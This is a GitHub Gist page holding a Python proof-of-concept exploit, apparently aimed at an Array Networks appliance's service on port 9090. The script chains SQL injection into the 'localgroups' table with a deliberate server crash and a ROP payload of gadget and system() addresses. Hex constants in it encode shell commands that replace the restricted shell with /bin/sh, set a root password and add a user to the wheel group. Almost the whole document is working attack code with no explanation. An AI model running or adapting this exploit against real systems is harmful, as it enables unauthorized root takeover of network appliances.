-
-
Save rrrrrrri/b94552a353f81f57ac6e6cc66062fedd to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import requests | |
import argparse | |
from requests.packages import urllib3 | |
urllib3.disable_warnings() | |
parser = argparse.ArgumentParser() | |
parser.add_argument('-ip', help='target url') | |
args = parser.parse_args() | |
class POC: | |
def __init__(self, ip): | |
self.ip = ip | |
def generate_groupnames(self): | |
_groupnames = [] | |
basic_chs = "abcdefghijklmnopqrstuvwxyz0123456789" | |
_tmp = 0 | |
for x in basic_chs: | |
for y in basic_chs: | |
if _tmp >= 1034: | |
return _groupnames | |
_tmp_str = x + y | |
_groupnames.append(_tmp_str) | |
_tmp += 1 | |
def _add_sql(self, payload): | |
URL = "http://" + self.ip + ":9090/query/clientverification2?_uname=array'));" + payload + ";/**/--" | |
HEADERS = {"Connection": "close"} | |
res = requests.get(URL, headers=HEADERS, verify=False, timeout=5) | |
if "<Rules>" not in res.text: | |
print(payload) | |
exit(0) | |
def _crash_server(self): | |
try: | |
URL = "http://" + self.ip + ":9090/query/hosts" | |
HEADERS = {"Content-Type": "application/xml"} | |
DATA = "<xml>\r\n <GroupNotification Op=\"0\" MasterID=\"1\" PeerID=\"2\" GID=\"3\">\r\n </GroupNotification>\r\n</xml>" | |
requests.post(URL, headers=HEADERS, data=DATA, verify=False, timeout=5) | |
except: | |
pass | |
def _rock(self): | |
group_names = self.generate_groupnames() | |
sql_payloads = [] | |
_id = 1 | |
for gpname in group_names: | |
_tmp_id = _id | |
if _tmp_id == 0x403: | |
_tmp_id = 24095752 | |
elif _tmp_id == 0x404: | |
_tmp_id = 8 | |
elif _tmp_id == 0x408: | |
_tmp_id = 1031 | |
elif _tmp_id == 0x407: | |
_tmp_id = 123457 | |
elif _tmp_id == 8: | |
_tmp_id = 123456 | |
_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (str(_tmp_id), gpname) | |
sql_payloads.append(_payload) | |
_id += 1 | |
delete_payload = "delete/**/from/**/localgroups" | |
URL = "http://" + self.ip + ":9090/query/clientverification2?_uname=array'));" + delete_payload + ";/**/--" | |
HEADERS = {"Connection": "close"} | |
res = requests.get(URL, headers=HEADERS, verify=False, timeout=5) | |
if "<Rules>" not in res.text: | |
exit(0) | |
for p in sql_payloads: | |
self._add_sql(p) | |
pop_rdi_ret = 0x0044f6ce | |
system_address = 0x0044D21C | |
command_address1 = 0xffffe6e0 | |
command_address2 = 0x00007fff | |
command_p27 = 0x3b3020 | |
command_p26 = 0x682d2074 | |
command_p25 = 0x6f6f7220 | |
command_p24 = 0x646f6d72 | |
command_p23 = 0x65737520 | |
command_p22 = 0x7770207c | |
command_p21 = 0x20333231 | |
command_p20 = 0x656d6b63 | |
command_p19 = 0x3066206f | |
command_p18 = 0x6863653b | |
command_p17 = 0x6c6c6568 | |
command_p16 = 0x735f6163 | |
command_p15 = 0x2f6e6962 | |
command_p14 = 0x2f61632f | |
command_p13 = 0x2068732f | |
command_p12 = 0x6e69622f | |
command_p11 = 0x2070633b | |
command_p10 = 0x6b61622e | |
command_p9 = 0x6c6c6568 | |
command_p8 = 0x735f6163 | |
command_p7 = 0x2f6e6962 | |
command_p6 = 0x2f61632f | |
command_p5 = 0x206c6c65 | |
command_p4 = 0x68735f61 | |
command_p3 = 0x632f6e69 | |
command_p2 = 0x622f6163 | |
command_p1 = 0x2f207063 | |
command_part2_5 = 0x3b6c6c65 | |
command_part2_4 = 0x68735f61 | |
command_part2_3 = 0x632f6e69 | |
command_part2_2 = 0x622f6163 | |
command_part2_1 = 0x2f206d72 | |
command_part3_8 = 0x3b6c2d20 | |
command_part3_7 = 0x736c3b6c | |
command_part3_6 = 0x65656877 | |
command_part3_5 = 0x20472d20 | |
command_part3_4 = 0x79617272 | |
command_part3_3 = 0x6120646f | |
command_part3_2 = 0x6d726573 | |
command_part3_1 = 0x75207770 | |
gadget_sql_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (pop_rdi_ret, "gad") | |
system_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (system_address, "sys") | |
command_addr_sql_payload1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_address1, "ca1") | |
command_addr_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_address2, "ca2") | |
zero_sql_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % ("0", "zer") | |
command_sql_payload1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p1, "cm1") | |
command_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p2, "cm2") | |
command_sql_payload3 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p3, "cm3") | |
command_sql_payload4 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p4, "cm4") | |
command_sql_payload5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p5, "cm5") | |
command_sql_payload6 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p6, "cm6") | |
command_sql_payload7 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p7, "cm7") | |
command_sql_payload8 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p8, "cm8") | |
command_sql_payload9 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p9, "cm9") | |
command_sql_payload10 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p10, "cm10") | |
command_sql_payload11 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p11, "cm11") | |
command_sql_payload12 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p12, "cm12") | |
command_sql_payload13 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p13, "cm13") | |
command_sql_payload18 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p18, "cm18") | |
command_sql_payload19 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p19, "cm19") | |
command_sql_payload20 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p20, "cm20") | |
command_sql_payload21 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p21, "cm21") | |
command_sql_payload22 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p22, "cm22") | |
command_sql_payload23 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p23, "cm23") | |
command_sql_payload24 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p24, "cm24") | |
command_sql_payload25 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p25, "cm25") | |
command_sql_payload26 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p26, "cm26") | |
command_sql_payload27 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p27, "cm27") | |
command_sql_payload_part2_1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part2_1, "cmp21") | |
command_sql_payload_part2_5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part2_5, "cmp25") | |
command_sql_payload_part3_1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_1, "cmp31") | |
command_sql_payload_part3_2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_2, "cmp32") | |
command_sql_payload_part3_3 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_3, "cmp33") | |
command_sql_payload_part3_4 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_4, "cmp34") | |
command_sql_payload_part3_5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_5, "cmp35") | |
command_sql_payload_part3_6 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_6, "cmp36") | |
command_sql_payload_part3_7 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_7, "cmp37") | |
command_sql_payload_part3_8 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_8, "cmp38") | |
self._add_sql(gadget_sql_payload) | |
self._add_sql(system_sql_payload2) | |
self._add_sql(command_addr_sql_payload1) | |
self._add_sql(command_addr_sql_payload2) | |
self._add_sql(zero_sql_payload) | |
self._add_sql(command_sql_payload1) | |
self._add_sql(command_sql_payload2) | |
self._add_sql(command_sql_payload3) | |
self._add_sql(command_sql_payload4) | |
self._add_sql(command_sql_payload5) | |
self._add_sql(command_sql_payload6) | |
self._add_sql(command_sql_payload7) | |
self._add_sql(command_sql_payload8) | |
self._add_sql(command_sql_payload9) | |
self._add_sql(command_sql_payload10) | |
self._add_sql(command_sql_payload11) | |
self._add_sql(command_sql_payload12) | |
self._add_sql(command_sql_payload13) | |
self._add_sql(command_sql_payload18) | |
self._add_sql(command_sql_payload19) | |
self._add_sql(command_sql_payload20) | |
self._add_sql(command_sql_payload21) | |
self._add_sql(command_sql_payload22) | |
self._add_sql(command_sql_payload23) | |
self._add_sql(command_sql_payload24) | |
self._add_sql(command_sql_payload25) | |
self._add_sql(command_sql_payload26) | |
self._add_sql(command_sql_payload27) | |
self._add_sql(command_sql_payload_part2_1) | |
self._add_sql(command_sql_payload_part2_5) | |
self._add_sql(command_sql_payload_part3_1) | |
self._add_sql(command_sql_payload_part3_2) | |
self._add_sql(command_sql_payload_part3_3) | |
self._add_sql(command_sql_payload_part3_4) | |
self._add_sql(command_sql_payload_part3_5) | |
self._add_sql(command_sql_payload_part3_6) | |
self._add_sql(command_sql_payload_part3_7) | |
self._add_sql(command_sql_payload_part3_8) | |
self._crash_server() | |
sleep(5) | |
try: | |
_role = "" | |
for _gp in group_names: | |
_role += _gp | |
_role += ":" | |
_role += "gad:zer:ca1:ca2:sys:zer:cmp31:cmp32:cmp33:cmp34:cmp35:cmp36:cmp37:cmp38:cmp21:cm2:cm3:cm4:cmp25:cm1:cm2:cm3:cm4:cm5:cm6:cm7:cm8:cm9:cm10:cm11:cm12:cm13:cm6:cm7:cm8:cm9:cm18:cm19:cm20:cm21:cm22:cm23:cm24:cm25:cm26:cm27" | |
t_payload = "GET /query/hosts?_uname=array&_pid=admin&_role=" + _role + " HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n" | |
p = remote(self.ip, 9090) | |
p.send(t_payload) | |
print(p.recv()) | |
p.close() | |
except: | |
pass | |
def start(self): | |
self._rock() | |
if __name__ == "__main__": | |
if args.ip: | |
try: | |
poc = POC(args.ip) | |
poc.start() | |
except Exception as e: | |
print(e) | |
else: | |
pass |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment